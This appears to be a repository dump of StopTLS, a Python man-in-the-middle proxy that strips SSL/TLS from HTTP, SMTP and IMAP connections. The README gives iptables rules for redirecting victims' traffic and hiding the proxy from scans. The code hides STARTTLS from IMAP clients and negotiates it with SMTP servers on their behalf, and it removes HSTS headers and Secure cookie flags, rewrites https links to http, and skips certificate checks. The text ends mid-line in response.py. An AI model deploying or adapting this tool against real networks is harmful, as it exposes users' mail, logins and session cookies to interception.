├── .gitignore ├── README.md ├── main.py ├── requirements.txt ├── setup.py └── stoptls ├── __init__.py ├── base.py ├── cache.py ├── resolver.py ├── tcp.py ├── tcp ├── __init__.py ├── base.py ├── imap.py └── smtp.py └── web ├── __init__.py ├── regex.py ├── request.py └── response.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | 49 | # Translations 50 | *.mo 51 | *.pot 52 | 53 | # Django stuff: 54 | *.log 55 | local_settings.py 56 | 57 | # Flask stuff: 58 | instance/ 59 | .webassets-cache 60 | 61 | # Scrapy stuff: 62 | .scrapy 63 | 64 | # Sphinx documentation 65 | docs/_build/ 66 | 67 | # PyBuilder 68 | target/ 69 | 70 | # Jupyter Notebook 71 | .ipynb_checkpoints 72 | 73 | # pyenv 74 | .python-version 75 | 76 | # celery beat schedule file 77 | celerybeat-schedule 78 | 79 | # SageMath parsed files 80 | *.sage.py 81 | 82 | # dotenv 83 | .env 84 | 85 | # virtualenv 86 | .venv 87 | venv/ 88 | ENV/ 89 | 90 | # Spyder project settings 91 | .spyderproject 92 | .spyproject 93 | 94 | # Rope project settings 95 | .ropeproject 96 | 97 | # mkdocs documentation 98 | /site 99 | 100 | # mypy 101 | .mypy_cache/ 102 | *~ 103 | .pytest_cache 104 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # StopTLS 2 | 3 | StopTLS is a Man-in-the-Middle tool which performs opportunistic SSL/TLS stripping. 4 | 5 | Currently it supports the following protocols: HTTP(S), SMTP, and IMAP 6 | 7 | It requires Python >= 3.5 (i.e. Python with support for async/await syntax), the [aiohttp](https://aiohttp.readthedocs.io/en/stable/) library, and the [Beautiful Soup](https://www.crummy.com/software/BeautifulSoup/) library for HTML parsing. 8 | 9 | ## Usage 10 | ``` 11 | usage: main.py [--help] [-h [HTTP_PORT]] [-t [TCP_PORT]] 12 | [-p {SMTP,IMAP} [{SMTP,IMAP} ...]] 13 | 14 | MitM proxy which performs opportunistic SSL/TLS stripping 15 | 16 | optional arguments: 17 | --help show this help message and exit 18 | -h [HTTP_PORT], --http [HTTP_PORT] 19 | HTTP listen port [default: 10000] 20 | -t [TCP_PORT], --tcp [TCP_PORT] 21 | TCP listen port [default: 49151] 22 | -p {SMTP,IMAP} [{SMTP,IMAP} ...], --tcp-protocols {SMTP,IMAP} [{SMTP,IMAP} ...] 23 | supported TCP protocols 24 | ``` 25 | 26 | ## Setup 27 | ### 1. Download 28 | ```bash 29 | $ git clone https://github.com/mathewmarcus/bruteforce-gpg.git 30 | ``` 31 | 32 | ### 2. Install Dependencies 33 | ``` bash 34 | $ pip install -r requirements.txt 35 | ``` 36 | 37 | ### 3. Add `iptables` rules 38 | Add rules to redirect and allow traffic to the ports specified by the `-h [HTTP_PORT], --http [HTTP_PORT]` and `-t [TCP_PORT], --tcp [TCP_PORT]` options. 39 | 40 | `stoptls` is setup to handle HTTP traffic on one port, and all other TCP traffic on another, as indicated by the CLI options. 41 | 42 | So, assuming the following `stoptls` invocation: 43 | ```bash 44 | $ python main.py --http 8080 --tcp 8081 --tcp-protocols SMTP IMAP 45 | ``` 46 | 47 | `iptables` rules would then need to be added to the `PREROUTING` chain in the `nat` table and the `INPUT` chain in the `filter` table, as shown below: 48 | 49 | #### `nat` table, `PREROUTING` chain 50 | ##### HTTP 51 | ```bash 52 | $ sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 53 | ``` 54 | 55 | ##### SMTP 56 | ```bash 57 | $ sudo iptables -t nat -A PREROUTING -p tcp --dport 25 -j REDIRECT --to-port 8081 58 | $ sudo iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-port 8081 59 | ``` 60 | 61 | ##### IMAP 62 | ```bash 63 | $ sudo iptables -t nat -A PREROUTING -p tcp --dport 143 -j REDIRECT --to-port 8081 64 | ``` 65 | 66 | #### `filter` table, `INPUT` chain 67 | Assuming a default `DROP` policy on this chain, add rules for the `HTTP_PORT` and/or `TCP_PORT`s specified earlier. So, for the above example: 68 | 69 | ##### HTTP 70 | ```bash 71 | sudo iptables -A INPUT -p tcp --dport 8080 -m conntrack --ctorigdstport 80 -j ACCEPT 72 | ``` 73 | 74 | ##### SMTP 75 | ```bash 76 | sudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 25 -j ACCEPT 77 | sudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 587 -j ACCEPT 78 | ``` 79 | 80 | ##### IMAP 81 | ```bash 82 | sudo iptables -A INPUT -p tcp --dport 8081 -m conntrack --ctorigdstport 143 -j ACCEPT 83 | ``` 84 | 85 | Why the `--ctorigdstport` option? This prevents the `stoptls` ports from being directly accessible (i.e. they will not appear in `nmap` scans). 86 | 87 | ## TODO 88 | It should be noted that `StopTLS` is very much a work in progress, and is essentially a POC at this point. In fact, currently, it doesn't log anything, but simply strips and proxies the connections. Below is a non-exhaustive list of features to be added. 89 | 90 | 1. Logging 91 | 2. Advanced configuration via an INI file 92 | 3. Custom log traffic filters for all protocols via config file directives and/or user-supplied callables (functions, methods, etc) 93 | 4. Support for additional, user-supplied protocols, by subclassing `stoptls.base.Proxy` and/or `stoptls.tcp.base.TCPProxyConn` abstract classes 94 | 5. Support for more complex, non-standard HTTP login mechanisms 95 | 6. Packaging and distribution via `pip` and `PyPi` repository 96 | 7. Integration testing with Docker 97 | 98 | ## Why? 99 | Why create yet another SSLstripping tool when... 100 | 1. tools such as `sslstrip` and `sslsplit` already exist 101 | 2. HTTP Strict Transport Security (HSTS) has significantly limited the effectiveness of sslstripping attacks. 102 | 103 | There are several answers: 104 | 1. I wanted to better understand the sslstripping attack vector. 105 | 2. I wanted to implement an sslstripping proxy using Python3 native asychronous support via `asyncio`, as opposed to an external library such as `twisted`. 106 | 3. I wanted a tool which supported/could support any TCP protocol which uses opportunistic SSL/TLS, in addition to HTTP. 107 | 4. I wanted a tool which was highly extensible and customizable. 108 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import argparse 3 | 4 | from stoptls.web import HTTPProxy 5 | from stoptls.tcp import TCPProxy 6 | 7 | 8 | parser = argparse.ArgumentParser(add_help='--help', 9 | conflict_handler='resolve', 10 | description='MitM proxy which performs \ 11 | opportunistic SSL/TLS stripping') 12 | parser.add_argument('-h', '--http', 13 | type=int, 14 | nargs='?', 15 | const=10000, 16 | dest='http_port', 17 | help='HTTP listen port [default: %(const)i]') 18 | parser.add_argument('-t', '--tcp', 19 | type=int, 20 | nargs='?', 21 | const=49151, 22 | dest='tcp_port', 23 | help='TCP listen port [default: %(const)i]') 24 | parser.add_argument('-p', '--tcp-protocols', 25 | default=['SMTP', 'IMAP'], 26 | nargs='+', 27 | choices=['SMTP', 'IMAP'], 28 | help='supported TCP protocols') 29 | 30 | if __name__ == '__main__': 31 | args = parser.parse_args() 32 | 33 | if not (args.http_port or args.tcp_port): 34 | parser.print_help() 35 | print('\nSelect -h [HTTP_PORT],--http [HTTP_PORT] and/or -t [TCP_PORT],--tcp [TCP_PORT]') 36 | exit(1) 37 | 38 | loop = asyncio.get_event_loop() 39 | 40 | if args.http_port: 41 | asyncio.ensure_future(HTTPProxy.main(args.http_port, 42 | args)) 43 | if args.tcp_port: 44 | asyncio.ensure_future(TCPProxy.main(args.tcp_port, 45 | args)) 46 | loop.run_forever() 47 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | aiohttp 2 | beautifulsoup4 3 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | from setuptools import setup 2 | 3 | setup( 4 | name="stoptls", 5 | version="0.1.0", 6 | packages=['stoptls'], 7 | description='MitM tool which performs opportunistic SSL/TLS stripping', 8 | author='Mathew Marcus', 9 | author_email='mathewmarcus456@gmail.com', 10 | long_description=open('README.md').read(), 11 | install_requires=[ 12 | 'aiohttp>=3.4.4', 13 | 'beautifulsoup4>=4.6.3' 14 | ] 15 | ) 16 | -------------------------------------------------------------------------------- /stoptls/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mathewmarcus/StopTLS/bd3dcf47ac1571e91abdd49bbcdf707f8e6a4cff/stoptls/__init__.py -------------------------------------------------------------------------------- /stoptls/base.py: -------------------------------------------------------------------------------- 1 | import abc 2 | import asyncio 3 | 4 | 5 | class Proxy(abc.ABC): 6 | protocol = None 7 | 8 | def __init__(self): 9 | super().__init__() 10 | 11 | @abc.abstractmethod 12 | def __call__(self, *args, **kwargs): 13 | return 14 | 15 | @classmethod 16 | async def main(cls, port, cli_args, *args, **kwargs): 17 | proxy = cls(*args, **kwargs) 18 | server = await asyncio.start_server(proxy, port=port) 19 | 20 | print("Serving {protocol} on {port}...".format(protocol=cls.protocol, 21 | port=port)) 22 | 23 | async with server: 24 | await server.serve_forever() 25 | -------------------------------------------------------------------------------- /stoptls/cache.py: -------------------------------------------------------------------------------- 1 | import urllib.parse 2 | 3 | 4 | class InMemoryCache(object): 5 | def __init__(self): 6 | self.cache = {} 7 | 8 | def get_client_cache(self, client_ip): 9 | return ClientCache(self.cache.setdefault(client_ip, {})) 10 | 11 | 12 | class RedisCache(object): 13 | def __init__(self): 14 | raise NotImplementedError 15 | 16 | 17 | class ClientCache(object): 18 | def __init__(self, data): 19 | self.cache = data 20 | 21 | def add_url(self, url, host=None): 22 | # unescape URL 23 | try: 24 | unescaped_url = bytes(url, 'ascii').decode('unicode_escape') 25 | except UnicodeDecodeError: 26 | unescaped_url = url 27 | 28 | unquoted_url = urllib.parse.unquote_plus(unescaped_url) 29 | scheme, netloc, path, query, frag = urllib.parse.urlsplit(unquoted_url) 30 | 31 | if netloc or not host: 32 | host = netloc 33 | 34 | rel_url = urllib.parse.urlunsplit(('', '', path, query, frag)) 35 | self.cache.setdefault(host, {})\ 36 | .setdefault('rel_urls', set([]))\ 37 | .add(rel_url) 38 | 39 | def has_url(self, host, rel_url): 40 | try: 41 | return urllib.parse.unquote_plus(rel_url) in self.cache[host]['rel_urls'] 42 | except KeyError: 43 | return False 44 | else: 45 | return False 46 | 47 | def add_cookie(self, host, cookie): 48 | self.cache.setdefault(host, {})\ 49 | .setdefault('cookies', set([]))\ 50 | .add(cookie) 51 | 52 | def has_cookie(self, host, cookie): 53 | try: 54 | return cookie in self.cache[host]['cookies'] 55 | except KeyError: 56 | return False 57 | else: 58 | return False 59 | 60 | def has_domain(self, host): 61 | try: 62 | return self.cache[host] 63 | except KeyError: 64 | return False 65 | -------------------------------------------------------------------------------- /stoptls/resolver.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import socket 3 | 4 | 5 | dns_cache = {} 6 | 7 | 8 | async def dns_resolve(hostname): 9 | hostname = hostname.split(':')[0] 10 | try: 11 | return dns_cache[hostname] 12 | except KeyError: 13 | addrinfo = await asyncio.get_running_loop().getaddrinfo(hostname, 14 | None, 15 | family=socket.AF_INET, 16 | type=socket.SOCK_STREAM, 17 | proto=socket.SOL_TCP) 18 | ip = addrinfo[0][4][0] 19 | dns_cache[hostname] = ip 20 | return ip 21 | -------------------------------------------------------------------------------- /stoptls/tcp.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | 3 | 4 | async def main(): 5 | server = await asyncio.start_server(lambda x: 1, '127.0.0.1', 8081) 6 | 7 | print("======= Serving generic TCP on 127.0.0.1:8081 ======") 8 | 9 | async with server: 10 | await server.serve_forever() 11 | -------------------------------------------------------------------------------- /stoptls/tcp/__init__.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import socket 3 | import struct 4 | import logging 5 | 6 | from stoptls.base import Proxy 7 | from stoptls.tcp.imap import IMAPProxyConn 8 | from stoptls.tcp.smtp import SMTPProxyConn 9 | 10 | 11 | class TCPProxy(Proxy): 12 | protocol = 'TCP' 13 | SO_ORIGINAL_DST = 80 14 | proxy_connection_handlers = {IMAPProxyConn.protocol: IMAPProxyConn, 15 | SMTPProxyConn.protocol: SMTPProxyConn} 16 | 17 | def __init__(self, connection_handlers): 18 | # TODO: process command line arguments 19 | self.conn_switcher = {} 20 | for handler in connection_handlers: 21 | for port in handler.ports: 22 | logging.debug('Egress port {}: {}'.format(port, handler)) 23 | self.conn_switcher[port] = handler 24 | super().__init__() 25 | 26 | async def __call__(self, client_reader, client_writer): 27 | dst_addr, dst_port = self.get_orig_dst_socket(client_writer) 28 | logging.debug('Original destination: {}:{}'.format(dst_addr, dst_port)) 29 | server_reader, server_writer = await asyncio.open_connection(dst_addr, 30 | dst_port) 31 | try: 32 | conn = self.conn_switcher[dst_port](client_reader, client_writer, 33 | server_reader, server_writer) 34 | logging.debug('Handling connection to {}:{}'.format(dst_addr, 35 | dst_port)) 36 | await conn.strip() 37 | except KeyError as e: 38 | raise Exception('No handler set up for destination port: {}' 39 | .format(dst_port)) 40 | 41 | def get_orig_dst_socket(self, client_writer): 42 | sock = client_writer.get_extra_info('socket') 43 | sockaddr_in = sock.getsockopt(socket.SOL_IP, 44 | TCPProxy.SO_ORIGINAL_DST, 45 | 16) 46 | port, = struct.unpack('!H', sockaddr_in[2:4]) 47 | address = socket.inet_ntoa(sockaddr_in[4:8]) 48 | return address, port 49 | 50 | @classmethod 51 | async def main(cls, port, cli_args, *args, **kwargs): 52 | conn_handlers = (cls.proxy_connection_handlers[p] for p in cli_args.tcp_protocols) 53 | 54 | await super().main(port, cli_args, connection_handlers=conn_handlers) 55 | -------------------------------------------------------------------------------- /stoptls/tcp/base.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import socket 3 | import ssl 4 | import logging 5 | import abc 6 | 7 | 8 | class TCPProxyConn(abc.ABC): 9 | protocol = None 10 | ports = None 11 | command_re = None 12 | response_re = None 13 | starttls_re = None 14 | 15 | def __init__(self, client_reader, client_writer, 16 | server_reader, server_writer): 17 | self.client_reader = client_reader 18 | self.client_writer = client_writer 19 | self.server_reader = server_reader 20 | self.server_writer = server_writer 21 | super().__init__() 22 | 23 | @abc.abstractmethod 24 | async def strip(self): 25 | self.server_writer.close() 26 | self.client_writer.close() 27 | logging.debug('Connections closed') 28 | 29 | async def upgrade_connection(self): 30 | sc = ssl.create_default_context(ssl.Purpose.SERVER_AUTH) 31 | sc.check_hostname = False 32 | sc.verify_mode = ssl.CERT_NONE 33 | 34 | try: 35 | nameinfo = await asyncio.get_running_loop()\ 36 | .getnameinfo(self.server_writer.get_extra_info('peername'), 37 | socket.NI_NAMEREQD) 38 | self.server_reader, self.server_writer = await asyncio \ 39 | .open_connection(sock=self.server_writer.get_extra_info('socket'), 40 | ssl=sc, 41 | server_hostname=nameinfo[0]) 42 | return True 43 | except Exception: 44 | logging.exception('Failed to upgrade to TLS') 45 | return False 46 | -------------------------------------------------------------------------------- /stoptls/tcp/imap.py: -------------------------------------------------------------------------------- 1 | import re 2 | import logging 3 | 4 | from stoptls.tcp.base import TCPProxyConn 5 | 6 | 7 | class IMAPProxyConn(TCPProxyConn): 8 | protocol = 'IMAP' 9 | ports = (143,) 10 | command_re = re.compile('^(?P\S*) (?P[A-Za-z]*)\r?\n$') 11 | response_re = re.compile('^(?P\S*) (?:(?P[Oo][Kk])|(?P[Bb][Aa][Dd])|(?P[Nn][Oo])|(?P[Bb][Yy][Ee]) )?(?P.*)\r\n$') 12 | starttls_re = re.compile('( ?)STARTTLS( ?)', flags=re.IGNORECASE) 13 | 14 | async def strip(self): 15 | cls = type(self) 16 | banner = await self.server_reader.readline() 17 | logging.debug('Received banner: {}'.format(banner)) 18 | 19 | banner = banner.decode('ascii') 20 | banner_re = cls.response_re.fullmatch(banner) 21 | 22 | if banner_re and \ 23 | banner_re.group('response') and \ 24 | cls.starttls_re.search(banner_re.group('response')): 25 | banner = cls.starttls_re.sub('', banner_re.group(0)) 26 | await self.start_tls() 27 | else: 28 | # It's possible that STARTTLS, among other CAPABILITYs - wasn't 29 | # included in the IMAP banner. In this case, we issue the 30 | # CAPABILITY command. If STARTTLS is indeed a capability, then we 31 | # upgrade the connection 32 | self.server_writer.write(b'asdf CAPABILITY\n') 33 | await self.server_writer.drain() 34 | 35 | tls_supported = await self.server_reader.readline('\n') 36 | logging.debug('Received data from server:{}').format(tls_supported) 37 | tls_supported_re = cls.response_re.fullmatch(tls_supported.decode('ascii')) 38 | 39 | if tls_supported_re and \ 40 | tls_supported_re.group('response') and \ 41 | cls.starttls_re.search(tls_supported_re.group('response')): 42 | await self.start_tls() 43 | 44 | self.client_writer.write(banner.encode('ascii')) 45 | logging.debug('Writing banner to client...') 46 | await self.client_writer.drain() 47 | 48 | while not self.server_reader.at_eof(): 49 | client_data = await self.client_reader.readline() 50 | logging.debug('Received client data: {}'.format(client_data)) 51 | 52 | if self.client_reader.at_eof(): 53 | logging.debug('Client closed connection') 54 | break 55 | 56 | try: 57 | self.server_writer.write(client_data) 58 | logging.debug('Writing client data to server...') 59 | await self.server_writer.drain() 60 | except ConnectionResetError: 61 | break 62 | 63 | while True: 64 | logging.debug('Reading from server...') 65 | server_data = await self.server_reader.readline() 66 | 67 | logging.debug('Received server data: {}'.format(server_data)) 68 | 69 | self.client_writer.write(server_data) 70 | logging.debug('Writing server data to client...') 71 | await self.client_writer.drain() 72 | 73 | server_data_re = cls.response_re.fullmatch(server_data.decode('ascii')) 74 | 75 | if not server_data_re or \ 76 | server_data_re.group('tag') != '*' or \ 77 | server_data_re.group('bad'): 78 | break 79 | 80 | await super().strip() 81 | 82 | async def start_tls(self): 83 | self.server_writer.write('asdf STARTTLS\n'.encode('ascii')) 84 | await self.server_writer.drain() 85 | 86 | tls_started = await self.server_reader.readline() 87 | tls_started_re = type(self).response_re.fullmatch(tls_started.decode('ascii')) 88 | 89 | if tls_started_re and tls_started_re.group('ok'): 90 | logging.debug('Sucessfully upgraded to TLS!') 91 | return await self.upgrade_connection() 92 | else: 93 | logging.debug('Failed to upgrade to TLS') 94 | return False 95 | -------------------------------------------------------------------------------- /stoptls/tcp/smtp.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import socket 3 | import re 4 | import logging 5 | 6 | from stoptls.tcp.base import TCPProxyConn 7 | 8 | 9 | class SMTPProxyConn(TCPProxyConn): 10 | protocol = 'SMTP' 11 | ports = (25, 587) 12 | command_re = re.compile('^(?P\S*)(?P .*)\r?\n$') 13 | response_re = re.compile('^(?P[0-9]{3})(?:(?P-)| )(?P.*)?\r\n$') 14 | 15 | async def strip(self): 16 | cls = type(self) 17 | banner = await self.server_reader.readline() 18 | logging.debug('Received banner: {}'.format(banner)) 19 | 20 | self.client_writer.write(banner) 21 | logging.debug('Writing banner to client...') 22 | await self.client_writer.drain() 23 | 24 | # Premptively issue an EHLO command. 25 | # If STARTTLS is supported, we upgrade connection 26 | client_address, client_port = self.client_writer.get_extra_info('peername') 27 | 28 | try: 29 | client_hostname = (await asyncio.get_running_loop() 30 | .getnameinfo((client_address, 31 | client_port))) 32 | except socket.gaierror: 33 | client_hostname = client_address 34 | 35 | self.server_writer.write('EHLO {}\r\n'.format(client_hostname).encode('ascii')) 36 | await self.server_writer.drain() 37 | 38 | # Process EHLO response. 39 | # TODO: Move this logic into a method 40 | ehlo_response = await self.server_reader.readline() 41 | ehlo_response_re = cls.response_re.fullmatch(ehlo_response.decode('ascii')) 42 | tls_supported = False 43 | while (not self.server_reader.at_eof() and 44 | ehlo_response_re and 45 | ehlo_response_re.group('line_cont')): 46 | if ehlo_response_re.group('message') and \ 47 | ehlo_response_re.group('message').upper() == 'STARTTLS': 48 | tls_supported = True 49 | 50 | ehlo_response = await self.server_reader.readline() 51 | ehlo_response_re = cls.response_re.fullmatch(ehlo_response.decode('ascii')) 52 | 53 | if tls_supported: 54 | await self.start_tls() 55 | 56 | while not self.server_reader.at_eof(): 57 | client_data = await self.client_reader.readline() 58 | logging.debug('Received client data: {}'.format(client_data)) 59 | 60 | client_data_re = cls.command_re.fullmatch(client_data.decode('ascii')) 61 | if self.client_reader.at_eof(): 62 | logging.debug('Client closed connection') 63 | break 64 | 65 | try: 66 | self.server_writer.write(client_data) 67 | logging.debug('Writing client data to server...') 68 | await self.server_writer.drain() 69 | except ConnectionResetError: 70 | break 71 | 72 | logging.debug('Reading line from server...') 73 | 74 | server_data = await self.server_reader.readline() 75 | 76 | logging.debug('Received server data: {}'.format(server_data)) 77 | self.client_writer.write(server_data) 78 | logging.debug('Writing server data to client...') 79 | await self.client_writer.drain() 80 | 81 | server_data_re = cls.response_re.fullmatch(server_data.decode('ascii')) 82 | 83 | if client_data_re: 84 | if client_data_re.group('cmd').upper() == 'EHLO': 85 | # handle EHLO 86 | server_data_re = cls.response_re.fullmatch(server_data.decode('ascii')) 87 | while (not self.server_reader.at_eof() and 88 | server_data_re and 89 | server_data_re.group('line_cont')): 90 | server_data = await self.server_reader.readline() 91 | server_data_re = cls.response_re.fullmatch(server_data.decode('ascii')) 92 | logging.debug('Received server data: {}'.format(server_data)) 93 | self.client_writer.write(server_data) 94 | logging.debug('Writing server data to client...') 95 | await self.client_writer.drain() 96 | elif (client_data_re.group('cmd').upper() == 'DATA' and 97 | server_data_re and 98 | server_data_re.group('status_code') == '354'): 99 | client_data = await self.client_reader.readline() 100 | self.server_writer.write(client_data) 101 | await self.server_writer.drain() 102 | while client_data != b'.\r\n': 103 | client_data = await self.client_reader.readline() 104 | self.server_writer.write(client_data) 105 | await self.server_writer.drain() 106 | 107 | logging.debug('Reading line from server...') 108 | server_data = await self.server_reader.readline() 109 | 110 | if self.server_reader.at_eof(): 111 | logging.debug('Server closed connection') 112 | break 113 | 114 | logging.debug('Received server data: {}'.format(server_data)) 115 | self.client_writer.write(server_data) 116 | logging.debug('Writing server data to client...') 117 | await self.client_writer.drain() 118 | 119 | await super().strip() 120 | 121 | async def start_tls(self): 122 | self.server_writer.write('STARTTLS\n'.encode('ascii')) 123 | await self.server_writer.drain() 124 | 125 | tls_started = await self.server_reader.readline() 126 | tls_started_re = type(self).response_re.fullmatch(tls_started.decode('ascii')) 127 | 128 | if tls_started_re and \ 129 | tls_started_re.group('status_code') == '220': 130 | logging.debug('Sucessfully upgraded to TLS!') 131 | return await self.upgrade_connection() 132 | else: 133 | logging.debug('Failed to upgrade to TLS') 134 | return False 135 | -------------------------------------------------------------------------------- /stoptls/web/__init__.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import aiohttp.web 3 | 4 | from stoptls.base import Proxy 5 | from stoptls.web.request import RequestProxy 6 | from stoptls.web.response import ResponseProxy 7 | from stoptls.cache import InMemoryCache 8 | 9 | 10 | class HTTPProxy(Proxy): 11 | protocol = 'HTTP' 12 | 13 | def __init__(self): 14 | self._tcp_connector = aiohttp.TCPConnector(ttl_dns_cache=None) 15 | self.session = aiohttp.ClientSession(connector=self._tcp_connector, 16 | cookie_jar=aiohttp.DummyCookieJar()) 17 | self.cache = InMemoryCache() 18 | 19 | async def __call__(self, request): 20 | request['cache'] = self.cache.get_client_cache(request.remote) 21 | request['session'] = self.session 22 | response = await RequestProxy(request).proxy_request() 23 | stripped_response = await ResponseProxy(response, 24 | request.host, 25 | request['cache']).strip_response() 26 | await stripped_response.prepare(request) 27 | return stripped_response 28 | 29 | @classmethod 30 | async def main(cls, port, cli_args): 31 | # HTTP is a special case because it uses aiohttp 32 | # rather than raw asyncio. As such, it uses loop.create_server 33 | # instead of start_server, in order to adhere to the aiohttp 34 | # documentation 35 | proxy = cls() 36 | server = await asyncio \ 37 | .get_running_loop() \ 38 | .create_server(aiohttp.web.Server(proxy), port=port) 39 | print('Serving HTTP on {}'.format(port)) 40 | 41 | async with server: 42 | await server.serve_forever() 43 | -------------------------------------------------------------------------------- /stoptls/web/regex.py: -------------------------------------------------------------------------------- 1 | import re 2 | 3 | SCHEME_DELIMITER = re.compile(':\/\/|:(?:\\\\x2[Ff]){2}|%3[Aa](?:%2[Ff]){2}') 4 | SCHEME = re.compile('(?:https)({})'.format(SCHEME_DELIMITER.pattern)) 5 | SECURE_URL = re.compile('(?:https)((?:{})[a-zA-z0-9.\/?\-#=&;%:~_$@+,\\\\]+)' 6 | .format(SCHEME_DELIMITER.pattern), 7 | flags=re.IGNORECASE) 8 | UNSECURE_URL = re.compile('(?:http)((?:{})[a-zA-z0-9.\/?\-#=&;%:~_$@+,\\\\]+)' 9 | .format(SCHEME_DELIMITER.pattern), 10 | flags=re.IGNORECASE) 11 | RELATIVE_URL = re.compile('(^\/(?!\/)[a-zA-z0-9.\/?\-#=&;%:~_$@+,\\\\]+)') 12 | COOKIE_SECURE_FLAG = re.compile('Secure;?', 13 | flags=re.IGNORECASE) 14 | CSS_OR_SCRIPT = re.compile('^script$|^style$') 15 | -------------------------------------------------------------------------------- /stoptls/web/request.py: -------------------------------------------------------------------------------- 1 | import urllib.parse 2 | 3 | from stoptls.web import regex 4 | 5 | 6 | class RequestProxy(object): 7 | HEADER_BLACKLIST = [ 8 | 'Upgrade-Insecure-Requests', 9 | 'Host' 10 | ] 11 | 12 | def __init__(self, request): 13 | self.request = request 14 | self.host = request.host 15 | self.cache = request['cache'] 16 | self.session = request['session'] 17 | 18 | async def proxy_request(self): 19 | # check if URL was previously stripped and cached 20 | if self.cache.has_url(self.host, 21 | self.request.rel_url.human_repr()): 22 | scheme = 'https' 23 | else: 24 | scheme = 'http' 25 | 26 | query_params = self.unstrip_query_params(self.request.url.query) 27 | 28 | orig_headers = dict(self.request.headers) 29 | headers = self.filter_and_strip_headers(orig_headers) 30 | 31 | # Kill sesssions 32 | cookies = self.filter_cookies(self.request.cookies) 33 | headers['Cookie'] = '; '.join(cookies) 34 | # TODO: possibly also remove certain types of auth (e.g. Authentication: Bearer) 35 | 36 | url = urllib.parse.urlunsplit((scheme, 37 | self.host, 38 | self.request.path, 39 | '', 40 | self.request.url.fragment)) 41 | method = self.request.method.lower() 42 | data = self.request.content if self.request.can_read_body else None 43 | 44 | #TODO: possibly use built-in aiohttp.ClientSession cache to store cookies, 45 | # maybe by subclassing aiohttp.abc.AbstractCookieJar 46 | return await self.session.request(method, 47 | url, 48 | data=data, 49 | headers=headers, 50 | params=query_params, 51 | # max_redirects=100) 52 | allow_redirects=False) # potentially set this to False to prevent auto-redirection) 53 | 54 | def filter_and_strip_headers(self, headers): 55 | for header in type(self).HEADER_BLACKLIST: 56 | headers.pop(header, None) 57 | 58 | try: 59 | parsed_origin = urllib.parse.urlsplit(headers['Origin']) 60 | if self.cache.has_domain(parsed_origin.netloc): 61 | headers['Origin'] = parsed_origin._replace(scheme='https').geturl() 62 | except KeyError: 63 | pass 64 | 65 | return headers 66 | 67 | def unstrip_query_params(self, query_params): 68 | unstripped_params = query_params.copy() 69 | for key, value in query_params.items(): 70 | 71 | # unstrip secure URLs in path params 72 | if regex.UNSECURE_URL.fullmatch(value): 73 | parsed_url = urllib.parse.urlsplit(value) 74 | if self.cache.has_url(parsed_url.netloc, 75 | urllib.parse.urlunsplit(('', 76 | '', 77 | parsed_url.path, 78 | parsed_url.query, 79 | parsed_url.fragment))): 80 | unstripped_params.update({key: parsed_url._replace(scheme='https').geturl()}) 81 | return unstripped_params 82 | 83 | def filter_cookies(self, cookies): 84 | for name, value in cookies.items(): 85 | if self.cache.has_cookie(self.host, 86 | name): 87 | yield '{}={}'.format(name, value) 88 | -------------------------------------------------------------------------------- /stoptls/web/response.py: -------------------------------------------------------------------------------- 1 | import aiohttp.web 2 | import bs4 3 | import urllib.parse 4 | 5 | from stoptls.web import regex 6 | 7 | 8 | class ResponseProxy(object): 9 | HEADER_BLACKLIST = [ 10 | 'Strict-Transport-Security', 11 | 'Content-Length', 12 | 'Content-Encoding', 13 | 'Transfer-Encoding', 14 | 'Set-Cookie' 15 | ] 16 | 17 | def __init__(self, response, host, cache): 18 | self.response = response 19 | self.host = host 20 | self.cache = cache 21 | 22 | async def strip_response(self): 23 | # strip secure URLs from HTML and Javascript bodies 24 | if self.response.content_type == 'text/html': 25 | try: 26 | body = await self.response.text() 27 | except UnicodeDecodeError: 28 | raw_body = await self.response.read() 29 | body = raw_body.decode('utf-8') 30 | body = self.strip_html_body(body) 31 | elif self.response.content_type == 'application/javascript': 32 | body = self.strip_text(await self.response.text()) 33 | elif self.response.content_type == 'text/css': 34 | body = self.strip_text(await self.response.text()) 35 | else: 36 | body = await self.response.read() 37 | # response.release() 38 | 39 | headers = self.filter_and_strip_headers(dict(self.response.headers)) 40 | 41 | stripped_response = aiohttp.web.Response(body=body, 42 | status=self.response.status, 43 | headers=headers) 44 | 45 | # remove secure flag from cookies 46 | for name, value, directives in self.strip_cookies(self.response.cookies, 47 | self.response.url.host): 48 | stripped_response.set_cookie(name, value, **directives) 49 | 50 | return stripped_response 51 | 52 | def strip_html_body(self, body): 53 | soup = bs4.BeautifulSoup(body, 'html.parser') 54 | secure_url_attrs = [] 55 | 56 | def has_secure_url_attr(tag): 57 | found = False 58 | url_attrs = [] 59 | for attr_name, attr_value in 